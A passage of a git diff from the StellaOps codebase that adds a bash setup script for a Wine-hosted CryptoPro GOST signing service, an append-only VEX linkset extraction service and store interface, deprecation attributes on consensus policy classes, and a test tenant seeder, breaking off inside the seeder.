+ log_info " WINEPREFIX=$WINE_PREFIX wine msiexec /i $CSP_INSTALLER"
+ return 1
+ }
+
+ # Verify installation
+ if wine reg query "HKLM\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Crypto-Pro GOST R 34.10-2012" 2>/dev/null; then
+ log_info "CryptoPro CSP installed successfully"
+ else
+ log_warn "CryptoPro CSP may not be registered correctly"
+ fi
+}
+
+# Build WineCspService for Windows
+build_service() {
+ log_info "Building WineCspService..."
+
+ mkdir -p "$OUTPUT_DIR"
+
+ # Build for Windows x64
+ dotnet publish "$SERVICE_DIR/WineCspService.csproj" \
+ -c Release \
+ -r win-x64 \
+ --self-contained true \
+ -o "$OUTPUT_DIR" \
+ || {
+ log_error "Build failed"
+ exit 1
+ }
+
+ log_info "Service built: $OUTPUT_DIR/WineCspService.exe"
+}
+
+# Create launcher script
+create_launcher() {
+ log_info "Creating launcher script..."
+
+ cat > "$OUTPUT_DIR/run-wine-csp-service.sh" << EOF
+#!/bin/bash
+# Wine CSP Service Launcher
+# Generated by setup-wine-csp-service.sh
+
+export WINEPREFIX="$WINE_PREFIX"
+export WINEDEBUG="-all" # Suppress Wine debug output
+
+PORT=\${WINE_CSP_PORT:-$WINE_CSP_PORT}
+SERVICE_DIR="\$(dirname "\$0")"
+
+echo "Starting Wine CSP Service on port \$PORT..."
+echo "Wine prefix: \$WINEPREFIX"
+echo ""
+
+cd "\$SERVICE_DIR"
+exec wine WineCspService.exe --urls "http://0.0.0.0:\$PORT"
+EOF
+
+ chmod +x "$OUTPUT_DIR/run-wine-csp-service.sh"
+ log_info "Launcher created: $OUTPUT_DIR/run-wine-csp-service.sh"
+}
+
+# Create systemd service file
+create_systemd_service() {
+ log_info "Creating systemd service file..."
+
+ cat > "$OUTPUT_DIR/wine-csp-service.service" << EOF
+[Unit]
+Description=Wine CSP Service for CryptoPro GOST signing
+After=network.target
+
+[Service]
+Type=simple
+User=$USER
+Environment=WINEPREFIX=$WINE_PREFIX
+Environment=WINEDEBUG=-all
+Environment=WINE_CSP_PORT=$WINE_CSP_PORT
+WorkingDirectory=$OUTPUT_DIR
+ExecStart=/bin/bash $OUTPUT_DIR/run-wine-csp-service.sh
+Restart=on-failure
+RestartSec=5
+
+[Install]
+WantedBy=multi-user.target
+EOF
+
+ log_info "Systemd service file created: $OUTPUT_DIR/wine-csp-service.service"
+ log_info "To install: sudo cp $OUTPUT_DIR/wine-csp-service.service /etc/systemd/system/"
+ log_info "To enable: sudo systemctl enable --now wine-csp-service"
+}
+
+# Create Docker Compose configuration
+create_docker_compose() {
+ log_info "Creating Docker Compose configuration..."
+
+ cat > "$OUTPUT_DIR/docker-compose.yml" << EOF
+# Wine CSP Service - Docker Compose configuration
+# Requires: Docker with Wine support or Windows container
+version: '3.8'
+
+services:
+ wine-csp-service:
+ build:
+ context: .
+ dockerfile: Dockerfile.wine
+ ports:
+ - "${WINE_CSP_PORT}:5099"
+ environment:
+ - ASPNETCORE_URLS=http://+:5099
+ volumes:
+ # Mount CSP installer if available
+ - ./csp-installer:/installer:ro
+ # Persist Wine prefix for keys/certificates
+ - wine-prefix:/root/.wine
+ healthcheck:
+ test: ["CMD", "curl", "-f", "http://localhost:5099/health"]
+ interval: 30s
+ timeout: 10s
+ retries: 3
+
+volumes:
+ wine-prefix:
+EOF
+
+ # Create Dockerfile
+ cat > "$OUTPUT_DIR/Dockerfile.wine" << 'EOF'
+# Wine CSP Service Dockerfile
+FROM ubuntu:22.04
+
+# Install Wine and dependencies
+RUN dpkg --add-architecture i386 && \
+ apt-get update && \
+ apt-get install -y --no-install-recommends \
+ wine64 \
+ wine32 \
+ winetricks \
+ curl \
+ ca-certificates \
+ && rm -rf /var/lib/apt/lists/*
+
+# Initialize Wine prefix
+RUN wineboot --init && \
+ winetricks -q vcrun2019 || true
+
+# Copy service
+WORKDIR /app
+COPY WineCspService.exe .
+COPY *.dll ./
+
+# Expose port
+EXPOSE 5099
+
+# Health check
+HEALTHCHECK --interval=30s --timeout=10s --retries=3 \
+ CMD curl -f http://localhost:5099/health || exit 1
+
+# Run service
+CMD ["wine", "WineCspService.exe", "--urls", "http://0.0.0.0:5099"]
+EOF
+
+ log_info "Docker configuration created in $OUTPUT_DIR/"
+}
+
+# Test the service
+test_service() {
+ log_info "Testing service startup..."
+
+ export WINEPREFIX="$WINE_PREFIX"
+ export WINEDEBUG="-all"
+
+ # Start service in background
+ cd "$OUTPUT_DIR"
+ wine WineCspService.exe --urls "http://localhost:$WINE_CSP_PORT" &
+ SERVICE_PID=$!
+
+ # Wait for startup
+ sleep 5
+
+ # Test health endpoint
+ if curl -s "http://localhost:$WINE_CSP_PORT/health" | grep -q "Healthy"; then
+ log_info "Service is running and healthy"
+
+ # Test status endpoint
+ log_info "CSP Status:"
+ curl -s "http://localhost:$WINE_CSP_PORT/status" | python3 -m json.tool 2>/dev/null || \
+ curl -s "http://localhost:$WINE_CSP_PORT/status"
+ else
+ log_warn "Service health check failed"
+ fi
+
+ # Stop service
+ kill $SERVICE_PID 2>/dev/null || true
+ wait $SERVICE_PID 2>/dev/null || true
+}
+
+# Print summary
+print_summary() {
+ echo ""
+ log_info "=========================================="
+ log_info "Wine CSP Service Setup Complete"
+ log_info "=========================================="
+ echo ""
+ echo "Wine prefix: $WINE_PREFIX"
+ echo "Service directory: $OUTPUT_DIR"
+ echo "HTTP port: $WINE_CSP_PORT"
+ echo ""
+ echo "To start the service:"
+ echo " $OUTPUT_DIR/run-wine-csp-service.sh"
+ echo ""
+ echo "To test endpoints:"
+ echo " curl http://localhost:$WINE_CSP_PORT/status"
+ echo " curl http://localhost:$WINE_CSP_PORT/keys"
+ echo " curl -X POST http://localhost:$WINE_CSP_PORT/hash \\"
+ echo " -H 'Content-Type: application/json' \\"
+ echo " -d '{\"dataBase64\":\"SGVsbG8gV29ybGQ=\"}'"
+ echo ""
+ if [[ -z "$CSP_INSTALLER" ]]; then
+ echo "NOTE: CryptoPro CSP is not installed."
+ echo " The service will report 'CSP not available'."
+ echo " To install CSP, run:"
+ echo " $0 --csp-installer /path/to/csp_setup_x64.msi"
+ fi
+}
+
+# Main execution
+main() {
+ log_info "Wine CSP Service Setup"
+ log_info "Repository: $REPO_ROOT"
+
+ check_prerequisites
+ init_wine_prefix
+ install_windows_components
+ install_cryptopro_csp
+ build_service
+ create_launcher
+ create_systemd_service
+ create_docker_compose
+ test_service
+ print_summary
+}
+
+main "$@"
diff --git a/src/Attestor/StellaOps.Attestor/StellaOps.Attestor.Infrastructure/Signing/AttestorSigningKeyRegistry.cs b/src/Attestor/StellaOps.Attestor/StellaOps.Attestor.Infrastructure/Signing/AttestorSigningKeyRegistry.cs
index aa52763fb..fc021b839 100644
--- a/src/Attestor/StellaOps.Attestor/StellaOps.Attestor.Infrastructure/Signing/AttestorSigningKeyRegistry.cs
+++ b/src/Attestor/StellaOps.Attestor/StellaOps.Attestor.Infrastructure/Signing/AttestorSigningKeyRegistry.cs
@@ -239,7 +239,8 @@ internal sealed class AttestorSigningKeyRegistry : IDisposable
new CryptoKeyReference(providerKeyId, providerName),
normalizedAlgorithm,
privateKeyBytes,
- now);
+ now,
+ metadata: metadata);
smProvider.UpsertSigningKey(signingKey);
}
diff --git a/src/Excititor/__Libraries/StellaOps.Excititor.Core/BaselineVexConsensusPolicy.cs b/src/Excititor/__Libraries/StellaOps.Excititor.Core/BaselineVexConsensusPolicy.cs
index dee90ff69..008da3e89 100644
--- a/src/Excititor/__Libraries/StellaOps.Excititor.Core/BaselineVexConsensusPolicy.cs
+++ b/src/Excititor/__Libraries/StellaOps.Excititor.Core/BaselineVexConsensusPolicy.cs
@@ -3,6 +3,12 @@ namespace StellaOps.Excititor.Core;
///
/// Baseline consensus policy applying tier-based weights and enforcing justification gates.
///
+///
+/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
+/// Use append-only linksets with
+/// and let downstream policy engines make verdicts.
+///
+[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed class BaselineVexConsensusPolicy : IVexConsensusPolicy
{
private readonly VexConsensusPolicyOptions _options;
diff --git a/src/Excititor/__Libraries/StellaOps.Excititor.Core/IVexConsensusPolicy.cs b/src/Excititor/__Libraries/StellaOps.Excititor.Core/IVexConsensusPolicy.cs
index 47b6e8a6d..61aa48c37 100644
--- a/src/Excititor/__Libraries/StellaOps.Excititor.Core/IVexConsensusPolicy.cs
+++ b/src/Excititor/__Libraries/StellaOps.Excititor.Core/IVexConsensusPolicy.cs
@@ -3,6 +3,12 @@ namespace StellaOps.Excititor.Core;
///
/// Policy abstraction supplying trust weights and gating logic for consensus decisions.
///
+///
+/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
+/// Use append-only linksets with
+/// and let downstream policy engines make verdicts.
+///
+[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public interface IVexConsensusPolicy
{
///
diff --git a/src/Excititor/__Libraries/StellaOps.Excititor.Core/Observations/AppendOnlyLinksetExtractionService.cs b/src/Excititor/__Libraries/StellaOps.Excititor.Core/Observations/AppendOnlyLinksetExtractionService.cs
new file mode 100644
index 000000000..ce1f342b5
--- /dev/null
+++ b/src/Excititor/__Libraries/StellaOps.Excititor.Core/Observations/AppendOnlyLinksetExtractionService.cs
@@ -0,0 +1,340 @@
+using System.Collections.Immutable;
+using Microsoft.Extensions.Logging;
+using StellaOps.Excititor.Core.Canonicalization;
+
+namespace StellaOps.Excititor.Core.Observations;
+
+///
+/// Extracts linkset updates from VEX observations using append-only semantics (AOC-19-013).
+/// Replaces consensus-based extraction with deterministic append-only operations.
+///
+public sealed class AppendOnlyLinksetExtractionService
+{
+ private readonly IAppendOnlyLinksetStore _store;
+ private readonly IVexLinksetEventPublisher? _eventPublisher;
+ private readonly ILogger _logger;
+
+ public AppendOnlyLinksetExtractionService(
+ IAppendOnlyLinksetStore store,
+ ILogger logger,
+ IVexLinksetEventPublisher? eventPublisher = null)
+ {
+ _store = store ?? throw new ArgumentNullException(nameof(store));
+ _logger = logger ?? throw new ArgumentNullException(nameof(logger));
+ _eventPublisher = eventPublisher;
+ }
+
+ ///
+ /// Processes observations and appends them to linksets.
+ /// Returns linkset update events for downstream consumers.
+ ///
+ public async Task> ProcessObservationsAsync(
+ string tenant,
+ IEnumerable observations,
+ CancellationToken cancellationToken)
+ {
+ if (string.IsNullOrWhiteSpace(tenant))
+ {
+ throw new ArgumentException("Tenant must be provided.", nameof(tenant));
+ }
+
+ if (observations is null)
+ {
+ return ImmutableArray.Empty;
+ }
+
+ var normalizedTenant = tenant.Trim().ToLowerInvariant();
+ var observationList = observations.Where(o => o is not null).ToList();
+
+ if (observationList.Count == 0)
+ {
+ return ImmutableArray.Empty;
+ }
+
+ // Group by (vulnerabilityId, productKey) deterministically
+ var groups = observationList
+ .SelectMany(obs => obs.Statements.Select(stmt => (obs, stmt)))
+ .GroupBy(x => new LinksetKey(
+ VulnerabilityId: Normalize(x.stmt.VulnerabilityId),
+ ProductKey: Normalize(x.stmt.ProductKey)))
+ .OrderBy(g => g.Key.VulnerabilityId, StringComparer.OrdinalIgnoreCase)
+ .ThenBy(g => g.Key.ProductKey, StringComparer.OrdinalIgnoreCase)
+ .ToList();
+
+ var results = new List(groups.Count);
+
+ foreach (var group in groups)
+ {
+ try
+ {
+ var result = await ProcessGroupAsync(
+ normalizedTenant,
+ group.Key,
+ group.Select(x => x.obs).Distinct(),
+ cancellationToken);
+
+ results.Add(result);
+
+ if (result.HadChanges && _eventPublisher is not null)
+ {
+ await _eventPublisher.PublishLinksetUpdatedAsync(
+ normalizedTenant,
+ result.Linkset,
+ cancellationToken);
+ }
+ }
+ catch (Exception ex)
+ {
+ _logger.LogError(
+ ex,
+ "Failed to process linkset for tenant {Tenant}, vulnerability {VulnerabilityId}, product {ProductKey}",
+ normalizedTenant,
+ group.Key.VulnerabilityId,
+ group.Key.ProductKey);
+
+ results.Add(LinksetAppendResult.Failed(
+ normalizedTenant,
+ group.Key.VulnerabilityId,
+ group.Key.ProductKey,
+ ex.Message));
+ }
+ }
+
+ _logger.LogInformation(
+ "Processed {ObservationCount} observations into {LinksetCount} linksets for tenant {Tenant}",
+ observationList.Count,
+ results.Count(r => r.Success),
+ normalizedTenant);
+
+ return results.ToImmutableArray();
+ }
+
+ ///
+ /// Appends a disagreement to a linkset.
+ ///
+ public async Task AppendDisagreementAsync(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ VexObservationDisagreement disagreement,
+ CancellationToken cancellationToken)
+ {
+ if (string.IsNullOrWhiteSpace(tenant))
+ {
+ throw new ArgumentException("Tenant must be provided.", nameof(tenant));
+ }
+
+ if (disagreement is null)
+ {
+ throw new ArgumentNullException(nameof(disagreement));
+ }
+
+ var normalizedTenant = tenant.Trim().ToLowerInvariant();
+ var normalizedVuln = Normalize(vulnerabilityId);
+ var normalizedProduct = Normalize(productKey);
+
+ try
+ {
+ var storeResult = await _store.AppendDisagreementAsync(
+ normalizedTenant,
+ normalizedVuln,
+ normalizedProduct,
+ disagreement,
+ cancellationToken);
+
+ if (storeResult.HadChanges && _eventPublisher is not null)
+ {
+ await _eventPublisher.PublishLinksetUpdatedAsync(
+ normalizedTenant,
+ storeResult.Linkset,
+ cancellationToken);
+ }
+
+ return LinksetAppendResult.Succeeded(
+ normalizedTenant,
+ normalizedVuln,
+ normalizedProduct,
+ storeResult.Linkset,
+ storeResult.WasCreated,
+ storeResult.ObservationsAdded,
+ storeResult.DisagreementsAdded,
+ storeResult.SequenceNumber);
+ }
+ catch (Exception ex)
+ {
+ _logger.LogError(
+ ex,
+ "Failed to append disagreement for tenant {Tenant}, vulnerability {VulnerabilityId}, product {ProductKey}",
+ normalizedTenant,
+ normalizedVuln,
+ normalizedProduct);
+
+ return LinksetAppendResult.Failed(
+ normalizedTenant,
+ normalizedVuln,
+ normalizedProduct,
+ ex.Message);
+ }
+ }
+
+ private async Task ProcessGroupAsync(
+ string tenant,
+ LinksetKey key,
+ IEnumerable observations,
+ CancellationToken cancellationToken)
+ {
+ var scope = BuildScope(key.ProductKey);
+ var observationRefs = observations
+ .SelectMany(obs => obs.Statements
+ .Where(stmt => string.Equals(Normalize(stmt.VulnerabilityId), key.VulnerabilityId, StringComparison.OrdinalIgnoreCase)
+ && string.Equals(Normalize(stmt.ProductKey), key.ProductKey, StringComparison.OrdinalIgnoreCase))
+ .Select(stmt => new VexLinksetObservationRefModel(
+ ObservationId: obs.ObservationId,
+ ProviderId: obs.ProviderId,
+ Status: stmt.Status.ToString().ToLowerInvariant(),
+ Confidence: null)))
+ .Distinct(VexLinksetObservationRefComparer.Instance)
+ .ToList();
+
+ if (observationRefs.Count == 0)
+ {
+ return LinksetAppendResult.NoChange(tenant, key.VulnerabilityId, key.ProductKey);
+ }
+
+ var storeResult = await _store.AppendObservationsBatchAsync(
+ tenant,
+ key.VulnerabilityId,
+ key.ProductKey,
+ observationRefs,
+ scope,
+ cancellationToken);
+
+ return LinksetAppendResult.Succeeded(
+ tenant,
+ key.VulnerabilityId,
+ key.ProductKey,
+ storeResult.Linkset,
+ storeResult.WasCreated,
+ storeResult.ObservationsAdded,
+ storeResult.DisagreementsAdded,
+ storeResult.SequenceNumber);
+ }
+
+ private static VexProductScope BuildScope(string productKey)
+ {
+ var canonicalizer = new VexProductKeyCanonicalizer();
+ try
+ {
+ var canonical = canonicalizer.Canonicalize(productKey);
+ var identifiers = canonical.Links
+ .Where(link => link is not null && !string.IsNullOrWhiteSpace(link.Identifier))
+ .Select(link => link.Identifier.Trim())
+ .Distinct(StringComparer.OrdinalIgnoreCase)
+ .ToImmutableArray();
+
+ var purl = canonical.Links.FirstOrDefault(link =>
+ string.Equals(link.Type, "purl", StringComparison.OrdinalIgnoreCase))?.Identifier;
+ var cpe = canonical.Links.FirstOrDefault(link =>
+ string.Equals(link.Type, "cpe", StringComparison.OrdinalIgnoreCase))?.Identifier;
+ var version = ExtractVersion(purl ?? canonical.ProductKey);
+
+ return new VexProductScope(
+ ProductKey: canonical.ProductKey,
+ Type: canonical.Scope.ToString().ToLowerInvariant(),
+ Version: version,
+ Purl: purl,
+ Cpe: cpe,
+ Identifiers: identifiers);
+ }
+ catch
+ {
+ return VexProductScope.Unknown(productKey);
+ }
+ }
+
+ private static string? ExtractVersion(string? key)
+ {
+ if (string.IsNullOrWhiteSpace(key))
+ {
+ return null;
+ }
+
+ var at = key.LastIndexOf('@');
+ return at >= 0 && at < key.Length - 1 ? key[(at + 1)..] : null;
+ }
+
+ private static string Normalize(string value) =>
+ VexObservation.EnsureNotNullOrWhiteSpace(value, nameof(value));
+
+ private sealed record LinksetKey(string VulnerabilityId, string ProductKey);
+}
+
+///
+/// Result of a linkset append operation.
+///
+public sealed record LinksetAppendResult
+{
+ private LinksetAppendResult(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ VexLinkset? linkset,
+ bool success,
+ bool wasCreated,
+ int observationsAdded,
+ int disagreementsAdded,
+ long sequenceNumber,
+ string? errorMessage)
+ {
+ Tenant = tenant;
+ VulnerabilityId = vulnerabilityId;
+ ProductKey = productKey;
+ Linkset = linkset;
+ Success = success;
+ WasCreated = wasCreated;
+ ObservationsAdded = observationsAdded;
+ DisagreementsAdded = disagreementsAdded;
+ SequenceNumber = sequenceNumber;
+ ErrorMessage = errorMessage;
+ }
+
+ public string Tenant { get; }
+ public string VulnerabilityId { get; }
+ public string ProductKey { get; }
+ public VexLinkset? Linkset { get; }
+ public bool Success { get; }
+ public bool WasCreated { get; }
+ public int ObservationsAdded { get; }
+ public int DisagreementsAdded { get; }
+ public long SequenceNumber { get; }
+ public string? ErrorMessage { get; }
+
+ public bool HadChanges => Success && (WasCreated || ObservationsAdded > 0 || DisagreementsAdded > 0);
+
+ public static LinksetAppendResult Succeeded(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ VexLinkset linkset,
+ bool wasCreated,
+ int observationsAdded,
+ int disagreementsAdded,
+ long sequenceNumber)
+ => new(tenant, vulnerabilityId, productKey, linkset, success: true,
+ wasCreated, observationsAdded, disagreementsAdded, sequenceNumber, errorMessage: null);
+
+ public static LinksetAppendResult NoChange(
+ string tenant,
+ string vulnerabilityId,
+ string productKey)
+ => new(tenant, vulnerabilityId, productKey, linkset: null, success: true,
+ wasCreated: false, observationsAdded: 0, disagreementsAdded: 0, sequenceNumber: 0, errorMessage: null);
+
+ public static LinksetAppendResult Failed(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ string errorMessage)
+ => new(tenant, vulnerabilityId, productKey, linkset: null, success: false,
+ wasCreated: false, observationsAdded: 0, disagreementsAdded: 0, sequenceNumber: 0, errorMessage);
+}
diff --git a/src/Excititor/__Libraries/StellaOps.Excititor.Core/Observations/IAppendOnlyLinksetStore.cs b/src/Excititor/__Libraries/StellaOps.Excititor.Core/Observations/IAppendOnlyLinksetStore.cs
new file mode 100644
index 000000000..7d0482761
--- /dev/null
+++ b/src/Excititor/__Libraries/StellaOps.Excititor.Core/Observations/IAppendOnlyLinksetStore.cs
@@ -0,0 +1,250 @@
+namespace StellaOps.Excititor.Core.Observations;
+
+///
+/// Append-only linkset store interface enforcing AOC-19 contract.
+/// Linksets can only be appended (new observations added), never modified or deleted.
+/// This guarantees deterministic replay and audit trails.
+///
+public interface IAppendOnlyLinksetStore
+{
+ ///
+ /// Appends a new observation to an existing linkset or creates a new linkset.
+ /// Returns the updated linkset with the new observation appended.
+ /// Thread-safe and idempotent (duplicate observations are deduplicated).
+ ///
+ /// Tenant identifier.
+ /// Vulnerability identifier (CVE, GHSA, etc.).
+ /// Product key (PURL, CPE, etc.).
+ /// The observation reference to append.
+ /// Product scope metadata.
+ /// Cancellation token.
+ /// The updated linkset with the appended observation.
+ ValueTask AppendObservationAsync(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ VexLinksetObservationRefModel observation,
+ VexProductScope scope,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Appends multiple observations to a linkset in a single atomic operation.
+ ///
+ ValueTask AppendObservationsBatchAsync(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ IEnumerable observations,
+ VexProductScope scope,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Appends a disagreement annotation to an existing linkset.
+ /// Disagreements are append-only and never removed.
+ ///
+ ValueTask AppendDisagreementAsync(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ VexObservationDisagreement disagreement,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Retrieves a linkset by tenant and linkset ID (read-only).
+ ///
+ ValueTask GetByIdAsync(
+ string tenant,
+ string linksetId,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Retrieves a linkset by vulnerability and product key (read-only).
+ ///
+ ValueTask GetByKeyAsync(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Finds linksets by vulnerability ID (read-only).
+ ///
+ ValueTask> FindByVulnerabilityAsync(
+ string tenant,
+ string vulnerabilityId,
+ int limit,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Finds linksets by product key (read-only).
+ ///
+ ValueTask> FindByProductKeyAsync(
+ string tenant,
+ string productKey,
+ int limit,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Finds linksets with conflicts/disagreements (read-only).
+ ///
+ ValueTask> FindWithConflictsAsync(
+ string tenant,
+ int limit,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Returns the count of linksets for the specified tenant.
+ ///
+ ValueTask CountAsync(
+ string tenant,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Returns the count of linksets with conflicts for the specified tenant.
+ ///
+ ValueTask CountWithConflictsAsync(
+ string tenant,
+ CancellationToken cancellationToken);
+
+ ///
+ /// Gets the append-only event log for a specific linkset.
+ /// Returns all mutations in chronological order for audit/replay.
+ ///
+ ValueTask> GetMutationLogAsync(
+ string tenant,
+ string linksetId,
+ CancellationToken cancellationToken);
+}
+
+///
+/// Result of an append operation on a linkset.
+///
+public sealed record AppendLinksetResult
+{
+ private AppendLinksetResult(
+ VexLinkset linkset,
+ bool wasCreated,
+ int observationsAdded,
+ int disagreementsAdded,
+ long sequenceNumber)
+ {
+ Linkset = linkset ?? throw new ArgumentNullException(nameof(linkset));
+ WasCreated = wasCreated;
+ ObservationsAdded = observationsAdded;
+ DisagreementsAdded = disagreementsAdded;
+ SequenceNumber = sequenceNumber;
+ }
+
+ ///
+ /// The updated linkset.
+ ///
+ public VexLinkset Linkset { get; }
+
+ ///
+ /// True if the linkset was newly created by this operation.
+ ///
+ public bool WasCreated { get; }
+
+ ///
+ /// Number of new observations added (0 if deduplicated).
+ ///
+ public int ObservationsAdded { get; }
+
+ ///
+ /// Number of new disagreements added (0 if deduplicated).
+ ///
+ public int DisagreementsAdded { get; }
+
+ ///
+ /// Monotonic sequence number for this mutation (for ordering/replay).
+ ///
+ public long SequenceNumber { get; }
+
+ ///
+ /// True if any data was actually appended.
+ ///
+ public bool HadChanges => WasCreated || ObservationsAdded > 0 || DisagreementsAdded > 0;
+
+ public static AppendLinksetResult Created(VexLinkset linkset, int observationsAdded, long sequenceNumber)
+ => new(linkset, wasCreated: true, observationsAdded, disagreementsAdded: 0, sequenceNumber);
+
+ public static AppendLinksetResult Updated(VexLinkset linkset, int observationsAdded, int disagreementsAdded, long sequenceNumber)
+ => new(linkset, wasCreated: false, observationsAdded, disagreementsAdded, sequenceNumber);
+
+ public static AppendLinksetResult NoChange(VexLinkset linkset, long sequenceNumber)
+ => new(linkset, wasCreated: false, observationsAdded: 0, disagreementsAdded: 0, sequenceNumber);
+}
+
+///
+/// Represents a mutation event in the append-only linkset log.
+/// Used for audit trails and deterministic replay.
+///
+public sealed record LinksetMutationEvent
+{
+ public LinksetMutationEvent(
+ long sequenceNumber,
+ string mutationType,
+ DateTimeOffset timestamp,
+ string? observationId,
+ string? providerId,
+ string? status,
+ double? confidence,
+ string? justification)
+ {
+ SequenceNumber = sequenceNumber;
+ MutationType = mutationType ?? throw new ArgumentNullException(nameof(mutationType));
+ Timestamp = timestamp.ToUniversalTime();
+ ObservationId = observationId;
+ ProviderId = providerId;
+ Status = status;
+ Confidence = confidence;
+ Justification = justification;
+ }
+
+ ///
+ /// Monotonic sequence number for ordering.
+ ///
+ public long SequenceNumber { get; }
+
+ ///
+ /// Type of mutation: "observation_added", "disagreement_added", "linkset_created".
+ ///
+ public string MutationType { get; }
+
+ ///
+ /// When this mutation occurred.
+ ///
+ public DateTimeOffset Timestamp { get; }
+
+ ///
+ /// Observation ID (for observation mutations).
+ ///
+ public string? ObservationId { get; }
+
+ ///
+ /// Provider ID.
+ ///
+ public string? ProviderId { get; }
+
+ ///
+ /// Status value.
+ ///
+ public string? Status { get; }
+
+ ///
+ /// Confidence value.
+ ///
+ public double? Confidence { get; }
+
+ ///
+ /// Justification (for disagreement mutations).
+ ///
+ public string? Justification { get; }
+
+ public static class MutationTypes
+ {
+ public const string LinksetCreated = "linkset_created";
+ public const string ObservationAdded = "observation_added";
+ public const string DisagreementAdded = "disagreement_added";
+ }
+}
diff --git a/src/Excititor/__Libraries/StellaOps.Excititor.Core/Testing/AuthorityTenantSeeder.cs b/src/Excititor/__Libraries/StellaOps.Excititor.Core/Testing/AuthorityTenantSeeder.cs
new file mode 100644
index 000000000..96cc47731
--- /dev/null
+++ b/src/Excititor/__Libraries/StellaOps.Excititor.Core/Testing/AuthorityTenantSeeder.cs
@@ -0,0 +1,264 @@
+using System.Collections.Immutable;
+using System.Text.Json;
+
+namespace StellaOps.Excititor.Core.Testing;
+
+///
+/// Utility for seeding Authority tenants in test scenarios (AOC-19-004).
+/// Provides deterministic tenant fixtures with configurable settings.
+///
+public sealed class AuthorityTenantSeeder
+{
+ private readonly List<TestTenant> _tenants = new();
+ private readonly HashSet<string> _usedSlugs = new(StringComparer.OrdinalIgnoreCase);
+
+ ///
+ /// Default test tenant for single-tenant scenarios.
+ ///
+ public static TestTenant DefaultTenant { get; } = new TestTenant(
+ Id: Guid.Parse("00000000-0000-0000-0000-000000000001"),
+ Slug: "test",
+ Name: "Test Tenant",
+ Description: "Default test tenant for unit tests",
+ Enabled: true,
+ Settings: TestTenantSettings.Default,
+ Metadata: TestTenantMetadata.Default);
+
+ ///
+ /// Multi-tenant test fixtures (Acme, Beta, Gamma).
+ ///
+ public static ImmutableArray<TestTenant> MultiTenantFixtures { get; } = ImmutableArray.Create(
+ new TestTenant(
+ Id: Guid.Parse("00000000-0000-0000-0000-000000000010"),
+ Slug: "acme",
+ Name: "Acme Corp",
+ Description: "Primary test tenant",
+ Enabled: true,
+ Settings: TestTenantSettings.Default,
+ Metadata: new TestTenantMetadata(
+ Environment: "test",
+ Region: "us-east-1",
+ Tier: "enterprise",
+ Features: ImmutableArray.Create("vex-ingestion", "policy-engine", "graph-explorer"))),
+ new TestTenant(
+ Id: Guid.Parse("00000000-0000-0000-0000-000000000020"),
+ Slug: "beta",
+ Name: "Beta Inc",
+ Description: "Secondary test tenant",
+ Enabled: true,
+ Settings: TestTenantSettings.Default with { MaxProviders = 5 },
+ Metadata: new TestTenantMetadata(
+ Environment: "test",
+ Region: "eu-west-1",
+ Tier: "professional",
+ Features: ImmutableArray.Create("vex-ingestion"))),
+ new TestTenant(
+ Id: Guid.Parse("00000000-0000-0000-0000-000000000030"),
+ Slug: "gamma",
+ Name: "Gamma Ltd",
+ Description: "Disabled test tenant",
+ Enabled: false,
+ Settings: TestTenantSettings.Default,
+ Metadata: TestTenantMetadata.Default));
+
+ ///
+ /// Airgap test tenant with restricted settings.
+ ///
+ public static TestTenant AirgapTenant { get; } = new TestTenant(
+ Id: Guid.Parse("00000000-0000-0000-0000-000000000099"),
+ Slug: "airgap-test",
+ Name: "Airgap Test Tenant",
+ Description: "Tenant for airgap/offline testing",
+ Enabled: true,
+ Settings: TestTenantSettings.Airgap,
+ Metadata: new TestTenantMetadata(
+ Environment: "airgap",
+ Region: "isolated",
+ Tier: "enterprise",
+ Features: ImmutableArray.Create("vex-ingestion", "offline-mode", "mirror-import")));
+
+ ///
+ /// Creates a new seeder instance.
+ ///
+ public AuthorityTenantSeeder()
+ {
+ }
+
+ ///
+ /// Adds the default test tenant to the seed set.
+ ///
+ public AuthorityTenantSeeder WithDefaultTenant()
+ {
+ AddTenant(DefaultTenant);
+ return this;
+ }
+
+ ///
+ /// Adds multi-tenant fixtures to the seed set.
+ ///
+ public AuthorityTenantSeeder WithMultiTenantFixtures()
+ {
+ foreach (var tenant in MultiTenantFixtures)
+ {
+ AddTenant(tenant);
+ }
+ return this;
+ }
+
+ ///
+ /// Adds the airgap test tenant to the seed set.
+ ///
+ public AuthorityTenantSeeder WithAirgapTenant()
+ {
+ AddTenant(AirgapTenant);
+ return this;
+ }
+
+ ///
+ /// Adds a custom tenant to the seed set.
+ ///
+ public AuthorityTenantSeeder WithTenant(TestTenant tenant)
+ {
+ AddTenant(tenant);
+ return this;
+ }
+
+ ///
+ /// Adds a custom tenant with minimal configuration.
+ ///
+ public AuthorityTenantSeeder WithTenant(string slug, string name, bool enabled = true)
+ {
+ var tenant = new TestTenant(
+ Id: Guid.NewGuid(),
+ Slug: slug,
+ Name: name,
+ Description: null,
+ Enabled: enabled,
+ Settings: TestTenantSettings.Default,
+ Metadata: TestTenantMetadata.Default);
+ AddTenant(tenant);
+ return this;
+ }
+
+ ///
+ /// Gets all tenants in the seed set.
+ ///
+ public IReadOnlyList<TestTenant> GetTenants() => _tenants.ToList();
+
+ ///
+ /// Gets tenant slugs for use in test data generation.
+ ///
+ public IReadOnlyList<string> GetSlugs() => _tenants.Select(t => t.Slug).ToList();
+
